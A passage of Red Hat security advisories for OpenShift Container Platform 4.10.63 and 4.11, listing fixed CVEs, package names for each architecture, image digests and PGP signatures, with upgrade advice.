podman-gvproxy-debuginfo-4.0.2-7.rhaos4.11.el8.s390x.rpm  
podman-plugins-4.0.2-7.rhaos4.11.el8.s390x.rpm  
podman-plugins-debuginfo-4.0.2-7.rhaos4.11.el8.s390x.rpm  
podman-remote-4.0.2-7.rhaos4.11.el8.s390x.rpm  
podman-remote-debuginfo-4.0.2-7.rhaos4.11.el8.s390x.rpm  
podman-tests-4.0.2-7.rhaos4.11.el8.s390x.rpm  
runc-1.1.2-2.rhaos4.11.el8.s390x.rpm  
runc-debuginfo-1.1.2-2.rhaos4.11.el8.s390x.rpm  
runc-debugsource-1.1.2-2.rhaos4.11.el8.s390x.rpm  
skopeo-1.5.2-4.rhaos4.11.el8.s390x.rpm  
skopeo-debuginfo-1.5.2-4.rhaos4.11.el8.s390x.rpm  
skopeo-debugsource-1.5.2-4.rhaos4.11.el8.s390x.rpm  
skopeo-tests-1.5.2-4.rhaos4.11.el8.s390x.rpm

x86_64:  
buildah-1.23.4-3.rhaos4.11.el8.x86_64.rpm  
buildah-debuginfo-1.23.4-3.rhaos4.11.el8.x86_64.rpm  
buildah-debugsource-1.23.4-3.rhaos4.11.el8.x86_64.rpm  
buildah-tests-1.23.4-3.rhaos4.11.el8.x86_64.rpm  
buildah-tests-debuginfo-1.23.4-3.rhaos4.11.el8.x86_64.rpm  
conmon-2.1.2-3.rhaos4.11.el8.x86_64.rpm  
conmon-debuginfo-2.1.2-3.rhaos4.11.el8.x86_64.rpm  
conmon-debugsource-2.1.2-3.rhaos4.11.el8.x86_64.rpm  
containernetworking-plugins-1.0.1-6.rhaos4.11.el8.x86_64.rpm  
containernetworking-plugins-debuginfo-1.0.1-6.rhaos4.11.el8.x86_64.rpm  
containernetworking-plugins-debugsource-1.0.1-6.rhaos4.11.el8.x86_64.rpm  
cri-o-1.24.6-2.rhaos4.11.git4bfe15a.el8.x86_64.rpm  
cri-o-debuginfo-1.24.6-2.rhaos4.11.git4bfe15a.el8.x86_64.rpm  
cri-o-debugsource-1.24.6-2.rhaos4.11.git4bfe15a.el8.x86_64.rpm  
openshift-clients-4.11.0-202306231116.p0.g2ae2303.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.11.0-202306231116.p0.g2ae2303.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.11.0-202306260054.p0.g990d55b.assembly.stream.el8.x86_64.rpm  
podman-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-catatonit-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-catatonit-debuginfo-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-debuginfo-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-debugsource-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-gvproxy-debuginfo-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-plugins-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-plugins-debuginfo-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-remote-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-remote-debuginfo-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
podman-tests-4.0.2-7.rhaos4.11.el8.x86_64.rpm  
runc-1.1.2-2.rhaos4.11.el8.x86_64.rpm  
runc-debuginfo-1.1.2-2.rhaos4.11.el8.x86_64.rpm  
runc-debugsource-1.1.2-2.rhaos4.11.el8.x86_64.rpm  
skopeo-1.5.2-4.rhaos4.11.el8.x86_64.rpm  
skopeo-debuginfo-1.5.2-4.rhaos4.11.el8.x86_64.rpm  
skopeo-debugsource-1.5.2-4.rhaos4.11.el8.x86_64.rpm  
skopeo-tests-1.5.2-4.rhaos4.11.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-23772  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkpjt7AAoJENzjgjWX9erEnZsQAKRcM+y6BeZeJH1RawZcl0tP  
Cc7QM52GHXraQX4kFLN1kAUtJEkwcKRCJ6zCOf3R0wK/+BNvFI7FvxkH6bjCMGbx  
5HEuJH1ouaAeDFkBh7CdBedre3+xRmPFtI7T6DMDhvFbpBexb7IvZ3fEE5iNG96G  
ysop1HLVxnm6Nq/bohbzRiYZGhEhRSlh797gjnFuRvExaaNvxja5a2PIfEoG8EMB  
hR+Ow1Rvv5zpNPMYyoNZY4VCjXCkMc4laXUj9YNTmh2G9RM3XMH7fgJ7tdceOP/X  
0FHG9sz99ZYpPTUDvEgtzokxPfTfhTmSkU20iFC+SuNJRtZcX7W+HoCLabRl6VlQ  
ekpK2C0+sPxqy4U+y4Xwe8egibnXCPaKLTE/N1aoeZlClzHDbVJBr1T3IR5g8Lrj  
k9pcRXKbCb66frLfY2o4VqfxVor8VdmuLbrtCtyEe+D6Uh3PZ20ivoBqVb93hdLA  
ouBdFqCbsGe0DWg344jHBBJ9snL4AhmiiBC9gBDbhIUY7gOTn8epyCOKjurRaSLr  
rUeE81i9F1cvUncZN7Z7TTv6hWcv6tl973EgQJgxVP+jfGpPDFGoKvcEp8cCRtZd  
vf3KUFlIzucUSvvgDzmT3DuvDw8+3FOkPVHz/5WvK793YceK7CnX7pcvpdiJnxan  
rmvM20rgy7QP3CMlJ0dT  
=9l4S  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3914-01

Red Hat Security Advisory 2023-3911-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.63.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.10.63 security update  
Advisory ID:       RHSA-2023:3911-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3911  
Issue date:        2023-07-06  
CVE Names:         CVE-2022-41717 CVE-2023-3089 CVE-2023-24540   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.10.63 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.10.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.10.63. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:3910

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

* openshift: OCP does not use FIPS-certified cryptography (CVE-2023-3089)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

      The sha values for the release are

      (For x86_64 architecture)  
The image digest is  
sha256:340091aefa0bba06bbb99cc58cb1f2b73404c832f72b83c526b8e7677efbecef

            (For s390x architecture)  
The image digest is  
sha256:9b4d9a313b4d6e94a5c707ee49592cb59fafa164c6c9a10da4e231ac7002e49d

            (For ppc64le architecture)  
The image digest is  
sha256:f23cdf8bc612b196450558c9197d0c66042647d460d88d84e1158b29fa4fc614

      (For aarch64 architecture)  
The image digest is  
sha256:3d796d605ff5c83d09d73c268702f018bb16c6fc526433b302b095581b08d83b

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace  
2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-12751 - [alibabacloud] IPI install got bootstrap failure and without any node ready, due to enforced EIP bandwidth 5 Mbit/s  
OCPBUGS-14359 - [4.10.z] [GCP] worker node with Sriov operator installed fails to come up online after reboot  
OCPBUGS-15178 - e2e-agnostic-ovn-cmd is permanently failing due to registry.centos.org

6. References:

https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkpjtUAAoJENzjgjWX9erEbBcP/jAUyXScFXfZdkPBQwKE9foB  
dAiEcH8hgGtZRWxrN6uKUfxhiBlkLtyBbUmzSGNHqAJdUxUO/IKEFhZQ39I2RVzU  
+JTwXQkxGbPnjxbVelsUa3lZI8NsWRH/2DSMTYbEy00Vh5GEzq2bp+3OiaZy1Dnb  
QOBxzsLlzTPzziZXGMuSBusBxZE5R2MNDp5pyz2DmfjwWENbzP44nItCW56hYtaO  
+ectkPeC8a4FWRR28YXanrp0YdUjzPFkl+3aqNA5Q9V5/A5pVFrEctem0JHaQdsP  
I04aNIvmOoGCTSFqLUQZiVYjiQH3ORjwAfY1GR68I7fFVzIpiBsg2luSJ87nwtv1  
oJY39XalgggOGdTh8f3BzkJhILR/lDaqPf3Pxj6d4tq1Abgku0kF/7SC8Tba6w8x  
2SsmPRuPXepr43BZr4oX1C0IMV42JWCKiDBMOL4uY59A3UdjtmgYVqkjf1stO20x  
eAyB+hq9ssjuVK14kz4dk87fN+ZllMIopS2J9qlBj1zFuz0EQPLrX8RQhSITo3Pk  
d7dLUYr4MaRWsJzbnSI/bgpl5WXyag5VJsyw7/RKYY/9h9Skqy87a64h3vTQXltv  
D/CV34uhSIbGjrCT2wNEBcZyrpNt8CRwk3qxCx9vnoiuFZdksqFtWOBplStpW2wj  
00xmd2M5k8djHo2W29Kc  
=yZqV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3911-01

Red Hat Security Advisory 2023-3910-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.63.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift Enterprise security update  
Advisory ID:       RHSA-2023:3910-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3910  
Issue date:        2023-07-06  
CVE Names:         CVE-2022-41717 CVE-2023-3089 CVE-2023-24540   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.10.63 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.10.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.10 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.10.63. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:3911

Security Fix(es):

* openshift: OCP & FIPS mode (CVE-2023-3089)

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

* golang: net/http: excessive memory growth in a Go server accepting HTTP/2  
requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

4.10.63

5. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: excessive memory growth in a Go server accepting HTTP/2 requests  
2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace  
2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

6. Package List:

Red Hat OpenShift Container Platform 4.10:

Source:  
openshift-4.10.0-202306170106.p0.g16bcd69.assembly.stream.el7.src.rpm  
openshift-ansible-4.10.0-202306170106.p0.g72c7be6.assembly.stream.el7.src.rpm  
openshift-clients-4.10.0-202306261054.p0.g22cf04a.assembly.stream.el7.src.rpm

noarch:  
openshift-ansible-4.10.0-202306170106.p0.g72c7be6.assembly.stream.el7.noarch.rpm  
openshift-ansible-test-4.10.0-202306170106.p0.g72c7be6.assembly.stream.el7.noarch.rpm

x86_64:  
openshift-clients-4.10.0-202306261054.p0.g22cf04a.assembly.stream.el7.x86_64.rpm  
openshift-clients-redistributable-4.10.0-202306261054.p0.g22cf04a.assembly.stream.el7.x86_64.rpm  
openshift-hyperkube-4.10.0-202306170106.p0.g16bcd69.assembly.stream.el7.x86_64.rpm

Red Hat OpenShift Container Platform 4.10:

Source:  
buildah-1.19.9-1.1.el8.src.rpm  
jenkins-2-plugins-4.10.1687341544-1.el8.src.rpm  
jenkins-2.401.1.1687268694-1.el8.src.rpm  
kernel-4.18.0-305.95.1.el8_4.src.rpm  
kernel-rt-4.18.0-305.95.1.rt7.170.el8_4.src.rpm  
openshift-4.10.0-202306170106.p0.g16bcd69.assembly.stream.el8.src.rpm  
openshift-ansible-4.10.0-202306170106.p0.g72c7be6.assembly.stream.el8.src.rpm  
openshift-clients-4.10.0-202306261054.p0.g22cf04a.assembly.stream.el8.src.rpm  
openshift-kuryr-4.10.0-202306170106.p0.g8e4df8b.assembly.stream.el8.src.rpm  
podman-3.2.3-1.1.rhaos4.10.el8.src.rpm  
skopeo-1.2.4-1.1.el8.src.rpm

aarch64:  
bpftool-4.18.0-305.95.1.el8_4.aarch64.rpm  
bpftool-debuginfo-4.18.0-305.95.1.el8_4.aarch64.rpm  
buildah-1.19.9-1.1.el8.aarch64.rpm  
buildah-debuginfo-1.19.9-1.1.el8.aarch64.rpm  
buildah-debugsource-1.19.9-1.1.el8.aarch64.rpm  
buildah-tests-1.19.9-1.1.el8.aarch64.rpm  
buildah-tests-debuginfo-1.19.9-1.1.el8.aarch64.rpm  
containers-common-1.2.4-1.1.el8.aarch64.rpm  
kernel-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-core-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-cross-headers-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-debug-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-debug-core-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-debug-devel-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-debug-modules-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-debug-modules-internal-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-debuginfo-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-devel-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-headers-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-modules-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-modules-extra-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-modules-internal-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-selftests-internal-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-tools-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-tools-libs-4.18.0-305.95.1.el8_4.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-305.95.1.el8_4.aarch64.rpm  
openshift-clients-4.10.0-202306261054.p0.g22cf04a.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.10.0-202306170106.p0.g16bcd69.assembly.stream.el8.aarch64.rpm  
perf-4.18.0-305.95.1.el8_4.aarch64.rpm  
perf-debuginfo-4.18.0-305.95.1.el8_4.aarch64.rpm  
podman-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
podman-catatonit-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
podman-catatonit-debuginfo-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
podman-debuginfo-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
podman-debugsource-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
podman-plugins-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
podman-plugins-debuginfo-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
podman-remote-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
podman-remote-debuginfo-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
podman-tests-3.2.3-1.1.rhaos4.10.el8.aarch64.rpm  
python3-perf-4.18.0-305.95.1.el8_4.aarch64.rpm  
python3-perf-debuginfo-4.18.0-305.95.1.el8_4.aarch64.rpm  
skopeo-1.2.4-1.1.el8.aarch64.rpm  
skopeo-debuginfo-1.2.4-1.1.el8.aarch64.rpm  
skopeo-debugsource-1.2.4-1.1.el8.aarch64.rpm  
skopeo-tests-1.2.4-1.1.el8.aarch64.rpm

noarch:  
jenkins-2-plugins-4.10.1687341544-1.el8.noarch.rpm  
jenkins-2.401.1.1687268694-1.el8.noarch.rpm  
kernel-doc-4.18.0-305.95.1.el8_4.noarch.rpm  
openshift-ansible-4.10.0-202306170106.p0.g72c7be6.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.10.0-202306170106.p0.g72c7be6.assembly.stream.el8.noarch.rpm  
openshift-kuryr-cni-4.10.0-202306170106.p0.g8e4df8b.assembly.stream.el8.noarch.rpm  
openshift-kuryr-common-4.10.0-202306170106.p0.g8e4df8b.assembly.stream.el8.noarch.rpm  
openshift-kuryr-controller-4.10.0-202306170106.p0.g8e4df8b.assembly.stream.el8.noarch.rpm  
podman-docker-3.2.3-1.1.rhaos4.10.el8.noarch.rpm  
python3-kuryr-kubernetes-4.10.0-202306170106.p0.g8e4df8b.assembly.stream.el8.noarch.rpm

ppc64le:  
bpftool-4.18.0-305.95.1.el8_4.ppc64le.rpm  
bpftool-debuginfo-4.18.0-305.95.1.el8_4.ppc64le.rpm  
buildah-1.19.9-1.1.el8.ppc64le.rpm  
buildah-debuginfo-1.19.9-1.1.el8.ppc64le.rpm  
buildah-debugsource-1.19.9-1.1.el8.ppc64le.rpm  
buildah-tests-1.19.9-1.1.el8.ppc64le.rpm  
buildah-tests-debuginfo-1.19.9-1.1.el8.ppc64le.rpm  
containers-common-1.2.4-1.1.el8.ppc64le.rpm  
kernel-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-core-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-cross-headers-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-debug-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-debug-core-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-debug-devel-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-debug-modules-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-debug-modules-internal-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-debuginfo-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-devel-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-headers-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-ipaclones-internal-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-modules-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-modules-extra-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-modules-internal-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-selftests-internal-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-tools-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-tools-libs-4.18.0-305.95.1.el8_4.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-305.95.1.el8_4.ppc64le.rpm  
openshift-clients-4.10.0-202306261054.p0.g22cf04a.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.10.0-202306170106.p0.g16bcd69.assembly.stream.el8.ppc64le.rpm  
perf-4.18.0-305.95.1.el8_4.ppc64le.rpm  
perf-debuginfo-4.18.0-305.95.1.el8_4.ppc64le.rpm  
podman-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
podman-catatonit-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
podman-catatonit-debuginfo-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
podman-debuginfo-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
podman-debugsource-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
podman-plugins-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
podman-plugins-debuginfo-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
podman-remote-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
podman-remote-debuginfo-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
podman-tests-3.2.3-1.1.rhaos4.10.el8.ppc64le.rpm  
python3-perf-4.18.0-305.95.1.el8_4.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-305.95.1.el8_4.ppc64le.rpm  
skopeo-1.2.4-1.1.el8.ppc64le.rpm  
skopeo-debuginfo-1.2.4-1.1.el8.ppc64le.rpm  
skopeo-debugsource-1.2.4-1.1.el8.ppc64le.rpm  
skopeo-tests-1.2.4-1.1.el8.ppc64le.rpm

s390x:  
bpftool-4.18.0-305.95.1.el8_4.s390x.rpm  
bpftool-debuginfo-4.18.0-305.95.1.el8_4.s390x.rpm  
buildah-1.19.9-1.1.el8.s390x.rpm  
buildah-debuginfo-1.19.9-1.1.el8.s390x.rpm  
buildah-debugsource-1.19.9-1.1.el8.s390x.rpm  
buildah-tests-1.19.9-1.1.el8.s390x.rpm  
buildah-tests-debuginfo-1.19.9-1.1.el8.s390x.rpm  
containers-common-1.2.4-1.1.el8.s390x.rpm  
kernel-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-core-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-cross-headers-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-debug-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-debug-core-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-debug-debuginfo-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-debug-devel-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-debug-modules-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-debug-modules-extra-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-debug-modules-internal-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-debuginfo-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-devel-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-headers-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-modules-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-modules-extra-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-modules-internal-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-selftests-internal-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-tools-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-tools-debuginfo-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-zfcpdump-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-zfcpdump-core-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-305.95.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-internal-4.18.0-305.95.1.el8_4.s390x.rpm  
openshift-clients-4.10.0-202306261054.p0.g22cf04a.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.10.0-202306170106.p0.g16bcd69.assembly.stream.el8.s390x.rpm  
perf-4.18.0-305.95.1.el8_4.s390x.rpm  
perf-debuginfo-4.18.0-305.95.1.el8_4.s390x.rpm  
podman-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
podman-catatonit-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
podman-catatonit-debuginfo-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
podman-debuginfo-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
podman-debugsource-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
podman-plugins-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
podman-plugins-debuginfo-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
podman-remote-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
podman-remote-debuginfo-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
podman-tests-3.2.3-1.1.rhaos4.10.el8.s390x.rpm  
python3-perf-4.18.0-305.95.1.el8_4.s390x.rpm  
python3-perf-debuginfo-4.18.0-305.95.1.el8_4.s390x.rpm  
skopeo-1.2.4-1.1.el8.s390x.rpm  
skopeo-debuginfo-1.2.4-1.1.el8.s390x.rpm  
skopeo-debugsource-1.2.4-1.1.el8.s390x.rpm  
skopeo-tests-1.2.4-1.1.el8.s390x.rpm

x86_64:  
bpftool-4.18.0-305.95.1.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.95.1.el8_4.x86_64.rpm  
buildah-1.19.9-1.1.el8.x86_64.rpm  
buildah-debuginfo-1.19.9-1.1.el8.x86_64.rpm  
buildah-debugsource-1.19.9-1.1.el8.x86_64.rpm  
buildah-tests-1.19.9-1.1.el8.x86_64.rpm  
buildah-tests-debuginfo-1.19.9-1.1.el8.x86_64.rpm  
containers-common-1.2.4-1.1.el8.x86_64.rpm  
kernel-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-debug-devel-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.95.1.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.95.1.el8_4.x86_64.rpm  
